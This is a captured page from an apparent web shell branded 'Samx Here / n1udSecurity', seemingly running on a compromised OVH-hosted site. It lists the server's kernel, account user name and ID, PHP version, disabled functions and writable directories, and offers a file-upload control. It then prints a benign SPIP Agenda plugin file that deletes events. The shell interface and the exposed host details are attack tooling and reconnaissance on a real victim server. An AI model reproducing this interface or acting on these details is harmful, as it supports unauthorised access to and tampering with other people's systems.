Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/jobs/plugins/auto/agenda/action/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/jobs/plugins/auto/agenda/action/supprimer_evenement.php
<?php
/**
 * Plugin Agenda 4 pour Spip 3.0
 * Licence GPL 3
 *
 * 2006-2011
 * Auteurs : cf paquet.xml
 */

if (!defined('_ECRIRE_INC_VERSION')) {
	return;
}

function action_supprimer_evenement_dist() {
	$securiser_action = charger_fonction('securiser_action', 'inc');
	$arg = $securiser_action();

	list($id_evenement, $id_article) = preg_split(',[^0-9],', $arg);
	include_spip('inc/autoriser');
	if (intval($id_article)
		and intval($id_evenement)
		and autoriser('supprimer', 'evenement', $id_evenement, null, array('id_article'=>$id_article))) {
		include_spip('action/editer_evenement');
		evenement_modifier($id_evenement, array('statut'=>'poubelle'));
	}
}

SAMX